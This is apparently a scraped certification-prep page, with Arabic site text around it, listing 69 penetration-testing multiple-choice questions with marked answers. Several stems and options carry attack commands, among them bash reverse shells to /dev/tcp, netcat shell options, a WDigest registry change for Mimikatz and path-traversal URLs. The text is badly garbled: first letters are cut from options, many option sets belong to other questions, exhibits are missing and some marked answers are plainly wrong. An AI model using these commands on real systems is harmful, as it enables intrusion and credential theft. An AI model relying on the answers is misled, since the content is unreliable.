لا تريد أن تفوت شيئا؟

نصائح اجتياز امتحان الشهادة

آخر أخبار الامتحانات ومعلومات الخصم

برعاية وحديثة من قبل خبرائنا

نعم، أرسل لي النشرة الإخبارية

خذ اختبارات أخرى عبر الإنترنت
السؤال #1
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
A. tored XSS
B. ill path disclosure
C. xpired certificate
D. lickjacking
عرض الإجابة
اجابة صحيحة: A
السؤال #2
During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.Which of the following would be the BEST target for continued exploitation efforts?
A. Operating system: Windows 7 Open ports: 23, 161
B. Operating system: Windows Server 2016 Open ports: 53, 5900
C. Operating system: Windows 8
D. Operating system: Windows 8 Open ports: 514, 3389
عرض الإجابة
اجابة صحيحة: C
السؤال #3
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. redential dump attack
B. LL injection attack
C. everse shell attack
D. ass the hash attack
عرض الإجابة
اجابة صحيحة: CDE
السؤال #4
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?
A. ttercap
B. cpdump
C. esponder
D. edusa
عرض الإجابة
اجابة صحيحة: C
السؤال #5
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. ulnerability scan
B. ynamic scan
C. tatic scan
D. ompliance scan
عرض الإجابة
اجابة صحيحة: A
السؤال #6
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.Which of the following registry changes would allow for credential caching in memory?
A. eg add HKLM\\System\\ControlSet002\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. eg add HKCU\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. eg add HKLM\\Software\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. eg add HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
عرض الإجابة
اجابة صحيحة: A
السؤال #7
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
A. he latest vulnerability scan results
B. list of sample application requests
C. n up-to-date list of possible exploits
D. list of sample test accounts
عرض الإجابة
اجابة صحيحة: B
السؤال #8
A penetration tester executes the following commands:Which of the following is a local host vulnerability that the attacker is exploiting?
A. nsecure file permissions
B. pplication whitelisting
C. hell escape
D. ritable service
عرض الإجابة
اجابة صحيحة: A
السؤال #9
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
عرض الإجابة
اجابة صحيحة: A
السؤال #10
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. TTP POST method
B. TTP OPTIONS method
C. TTP PUT method
D. TTP TRACE method
عرض الإجابة
اجابة صحيحة: A
السؤال #11
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswdWhich of the following attack types is MOST likely to be the vulnerability?
A. cope creep
B. ost-mortem review
C. isk acceptance
D. hreat prevention
عرض الإجابة
اجابة صحيحة: B
السؤال #12
An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials. Which of the following types of attacks is this an example of?
A. licitation attack
B. mpersonation attack
C. pear phishing attack
D. rive-by download attack
عرض الإجابة
اجابة صحيحة: A
السؤال #13
During the information gathering phase of a network penetration test for the corp.local domain, which of the following commands would provide a list of domain controllers?
A. slookup –type=srv _ldap
B. map –sV –p 389 - -script=ldap-rootdse corp
C. et group “Domain Controllers” /domain
D. presult /d corp
عرض الإجابة
اجابة صحيحة: A
السؤال #14
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. pipe
B. ke-scan -A -t 1 --sourceip=spoof_ip 100
C. map -sS -A -f 100
D. c 100
عرض الإجابة
اجابة صحيحة: B
السؤال #15
Click the exhibit button. A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
A. NMP brute forcing
B. RP spoofing
C. NS cache poisoning
D. MTP relay
عرض الإجابة
اجابة صحيحة: A
السؤال #16
Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own. Which of the following URLs can he use to accomplish this attack?
A. ttps://testbank
B. ttps://testbank
C. ttps://testbank
D. ttps://testbank
عرض الإجابة
اجابة صحيحة: B
السؤال #17
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
عرض الإجابة
اجابة صحيحة: D
السؤال #18
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A. ownload the GHOST file to a Linux system and compilegcc -o GHOSTtest i:
B. ownload the GHOST file to a Windows system and compilegcc -o GHOST GHOST
C. ownload the GHOST file to a Linux system and compilegcc -o GHOST GHOST
D. ownload the GHOST file to a Windows system and compilegcc -o GHOSTtest i:
عرض الإجابة
اجابة صحيحة: C
السؤال #19
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. ommand injection attack
B. lickjacking attack
C. irectory traversal attack
D. emote file inclusion attack
عرض الإجابة
اجابة صحيحة: B
السؤال #20
During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.dbWhich of the following file system vulnerabilities does this command take advantage of?
A. ierarchical file system
B. lternate data streams
C. ackdoor success
D. xtended file system
عرض الإجابة
اجابة صحيحة: B
السؤال #21
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. map -p 22 -iL targets
B. map -p 22 -sL targets
C. map -p 22 -oG targets
D. map -p 22 -oA targets
عرض الإجابة
اجابة صحيحة: A
السؤال #22
A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting “True”.Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)
A. OW
B. DA
C. ULA
D. PA
عرض الإجابة
اجابة صحيحة: BD
السؤال #23
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. KEY_CLASSES_ROOT
B. KEY_LOCAL_MACHINE
C. KEY_CURRENT_USER
D. KEY_CURRENT_CONFIG
عرض الإجابة
اجابة صحيحة: C
السؤال #24
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
A. AC address of the client
B. AC address of the domain controller
C. AC address of the web server
D. AC address of the gateway
عرض الإجابة
اجابة صحيحة: AE
السؤال #25
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. rom the remote computer, run the following commands:export XHOST 192
B. rom the local computer, run the following command:ssh -L4444:127
C. rom the remote computer, run the following command:ssh -R6000:127
D. rom the local computer, run the following command:nc -l -p 6000Then, from the remote computer, run the following command:xterm | nc 192
عرض الإجابة
اجابة صحيحة: A
السؤال #26
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. each
B. eWL
C. penVAS
D. hodan
عرض الإجابة
اجابة صحيحة: D
السؤال #27
Which of the following is an example of a spear phishing attack?
A. ample SOAP messages
B. he REST API documentation
C. protocol fuzzing utility
D. n applicable XSD file
عرض الإجابة
اجابة صحيحة: A
السؤال #28
Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?
A. enetration test findings often contain company intellectual property
B. enetration test findings could lead to consumer dissatisfaction if made public
C. enetration test findings are legal documents containing privileged information
D. enetration test findings can assist an attacker in compromising a system
عرض الإجابة
اجابة صحيحة: D
السؤال #29
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
A. ocating emergency exits
B. reparing a pretext
C. houlder surfing the victim
D. ailgating the victim
عرض الإجابة
اجابة صحيحة: B
السؤال #30
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:-Code review-Updates to firewall settingsWhich of the following has occurred in this situation?
A. numeration of services
B. SINT gathering
C. ort scanning
D. ocial engineering
عرض الإجابة
اجابة صحيحة: A
السؤال #31
A penetration tester ran the following Nmap scan on a computer:nmap -aV 192.168.1.5The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
A. he organization failed to disable Telnet
B. map results contain a false positive for port 23
C. ort 22 was filtered
D. he service is running on a non-standard port
عرض الإجابة
اجابة صحيحة: A
السؤال #32
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. reating a scope of the critical production systems
B. etting a schedule of testing access times
C. stablishing a white-box testing engagement
D. aving management sign off on intrusive testing
عرض الإجابة
اجابة صحيحة: B
السؤال #33
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
A. erform an HTTP downgrade attack
B. arvest the user credentials to decrypt traffic
C. erform an MITM attack
D. mplement a CA attack by impersonating trusted CAs
عرض الإجابة
اجابة صحيحة: A
السؤال #34
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. CS vendors are slow to implement adequate security controls
B. CS staff are not adequately trained to perform basic duties
C. here is a scarcity of replacement equipment for critical devices
D. here is a lack of compliance for ICS facilities
عرض الإجابة
اجابة صحيحة: B
السؤال #35
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:-XSS-HTTP DELETE method allowed-SQL injection-Vulnerable to CSRFTo which of the following should the tester give the HIGHEST priority?
A. QL injection
B. TTP DELETE method allowed
C. ulnerable to CSRF
D. SS
عرض الإجابة
اجابة صحيحة: B
السؤال #36
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
A. map -p 53 -oG dnslist
B. slookup -ns 8
C. or x in {1
D. ig -r > echo “8
عرض الإجابة
اجابة صحيحة: A
السؤال #37
Given the following:http://example.com/download.php?id-.../.../.../etc/passwdWhich of the following BEST describes the above attack?
A. alicious file upload attack
B. edirect attack
C. irectory traversal attack
D. nsecure direct object reference attack
عرض الإجابة
اجابة صحيحة: C
السؤال #38
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. anufacturers developing IoT devices are less concerned with security
B. t is difficult for administrators to implement the same security standards across the board
C. oT systems often lack the hardware power required by more secure solutions
D. egulatory authorities often have lower security requirements for IoT systems
عرض الإجابة
اجابة صحيحة: BC
السؤال #39
For which of the following reasons does a penetration tester need to have a customer’s point-of-contact information available at all times? (Choose three.)
A. SASS
B. AM database
C. ctive Directory
D. egistry
عرض الإجابة
اجابة صحيحة: ACF
السؤال #40
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
A. chtasks
B. et session server | dsquery -user | net use c$
C. owershell && set-executionpolicy unrestricted
D. eg save HKLM\\System\\CurrentControlSet\\Services\\Sv
عرض الإجابة
اجابة صحيحة: D
السؤال #41
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
A. orizontally escalate privileges
B. crape the page for hidden fields
C. nalyze HTTP response code
D. earch for HTTP headers
عرض الإجابة
اجابة صحيحة: B
السؤال #42
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?
A. ommon libraries
B. onfiguration files
C. andbox escape
D. SLR bypass
عرض الإجابة
اجابة صحيحة: A
السؤال #43
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. bsolete software may contain exploitable components
B. eak password management practices may be employed
C. ryptographically weak protocols may be intercepted
D. eb server configurations may reveal sensitive information
عرض الإجابة
اجابة صحيحة: AB
السؤال #44
A penetration tester is reviewing the following output from a wireless sniffer:Which of the following can be extrapolated from the above information?
A. rinciple of fear
B. rinciple of authority
C. rinciple of scarcity
D. rinciple of likeness
E. rinciple of social proof
عرض الإجابة
اجابة صحيحة: C
السؤال #45
A penetration tester runs the following from a compromised ‘python -c ‘import pty;pty.spawn (“/bin/bash”) ’.Which of the following actions are the tester taking?
A. emoving the Bash history
B. pgrading the shell
C. reating a sandbox
D. apturing credentials
عرض الإجابة
اجابة صحيحة: B
السؤال #46
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
A. dvanced persistent threat
B. cript kiddie
C. acktivist
D. rganized crime
عرض الإجابة
اجابة صحيحة: B
السؤال #47
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email.Which of the following types of motivation was used in this attack?
A. odify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing
B. mplement new training to be aware of the risks in accessing the application
C. mplement an ACL to restrict access to the application exclusively to the finance department
D. equire payroll users to change the passwords used to authenticate to the application
عرض الإجابة
اجابة صحيحة: B
السؤال #48
A tester intends to run the following command on a target system:bash -i >& /dev/tcp/10.2.4.6/443 0> &1Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?
A. c -nlvp 443
B. c 10
C. c -w3 10
D. c -e /bin/sh 10
عرض الإجابة
اجابة صحيحة: D
السؤال #49
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
A. ules of engagement
B. equest for proposal
C. aster service agreement
D. usiness impact analysis
عرض الإجابة
اجابة صحيحة: A
السؤال #50
The following command is run on a Linux file system:chmod 4111 /usr/bin/sudoWhich of the following issues may be exploited now?
A. ernel vulnerabilities
B. ticky bits
C. nquoted service path
D. isconfigured sudo
عرض الإجابة
اجابة صحيحة: B
السؤال #51
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8Which of the following formats is the correct hash type?
A. erberos
B. etNTLMv1
C. TLM
D. HA-1
عرض الإجابة
اجابة صحيحة: D
السؤال #52
The following line was found in an exploited machine's history file. An attacker ran the following command:bash -i >& /dev/tcp/192.168.0.1/80 0> &1Which of the following describes what the command does?
A. ockpicking
B. gress sensor triggering
C. ock bumping
D. ock bypass
عرض الإجابة
اجابة صحيحة: C
السؤال #53
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile.The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?
A. The badge was cloned
B. The physical access control server is malfunctioning
C. The system reached the crossover error rate
D. The employee lost the badge
عرض الإجابة
اجابة صحيحة: A
السؤال #54
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
A. Nikto
B. WAR
C. W3AF
D. Swagger
عرض الإجابة
اجابة صحيحة: D
السؤال #55
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users ?€DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
عرض الإجابة
اجابة صحيحة: D
السؤال #56
In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
A. rute force the user’s password
B. erform an ARP spoofing attack
C. everage the BeEF framework to capture credentials
D. onduct LLMNR/NETBIOS-ns poisoning
عرض الإجابة
اجابة صحيحة: A
السؤال #57
In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
A. Brute force the user?€?s password
B. Perform an ARP spoofing attack
C. Leverage the BeEF framework to capture credentials
D. Conduct LLMNR/NETBIOS-ns poisoning
عرض الإجابة
اجابة صحيحة: A
السؤال #58
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. erl -e 'use SOCKET'; $i='; $p='443;
B. sh superadmin@ -p 443
C. c -e /bin/sh 443
D. ash -i >& /dev/tcp//443 0>&1
عرض الإجابة
اجابة صحيحة: D
السؤال #59
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. rpspoof
B. map
C. esponder
D. urpsuite
عرض الإجابة
اجابة صحيحة: A
السؤال #60
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)
A. pply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation
B. dentify the issues that can be remediated most quickly and address them first
C. mplement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
D. ix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime
عرض الإجابة
اجابة صحيحة: BD
السؤال #61
HOTSPOTInstructions:Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.You are a security analyst tasked with hardening a web server.You have been given a list of HTTP payloads that were flagged as malicious.Hot Area:
A. ee Explanation section for answer
عرض الإجابة
اجابة صحيحة: A
السؤال #62
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?
A. he badge was cloned
B. he physical access control server is malfunctioning
C. he system reached the crossover error rate
D. he employee lost the badge
عرض الإجابة
اجابة صحيحة: A
السؤال #63
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. et rhost 192
B. un autoroute -s 192
C. b_nmap -iL /tmp/privatehosts
D. se auxiliary/server/socks4a
عرض الإجابة
اجابة صحيحة: A
السؤال #64
Which of the following is the purpose of an NDA?
A. utlines the terms of confidentiality between both parties
B. utlines the boundaries of which systems are authorized for testing
C. utlines the requirements of technical testing that are allowed
D. utlines the detailed configuration of the network
عرض الإجابة
اجابة صحيحة: A
السؤال #65
A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command:nmap 100.100/1/0-125Which of the following commands would be BEST to return results?
A. map -Pn -sT 100
B. map -sF -p 100
C. map -sV -oA output 100
D. map 100
عرض الإجابة
اجابة صحيحة: A
السؤال #66
Given the following Python script:Which of the following is where the output will go?
A. o the screen
B. o a network server
C. o a file
D. o /dev/null
عرض الإجابة
اجابة صحيحة: C
السؤال #67
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. CP SYN flood
B. QL injection
C. SS
D. MAS scan
عرض الإجابة
اجابة صحيحة: B
السؤال #68
Which of the following would be the BEST for performing passive reconnaissance on a target?€?s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
عرض الإجابة
اجابة صحيحة: D
السؤال #69
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. tack pointer register
B. ndex pointer register
C. tack base pointer
D. estination index register
عرض الإجابة
اجابة صحيحة: A

عرض الإجابات بعد التقديم

يرجى إرسال البريد الإلكتروني الخاص بك والواتس اب للحصول على إجابات الأسئلة.

ملحوظة: يرجى التأكد من صلاحية معرف البريد الإلكتروني وWhatsApp حتى تتمكن من الحصول على نتائج الاختبار الصحيحة.

بريد إلكتروني:
رقم الواتس اب/الهاتف:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.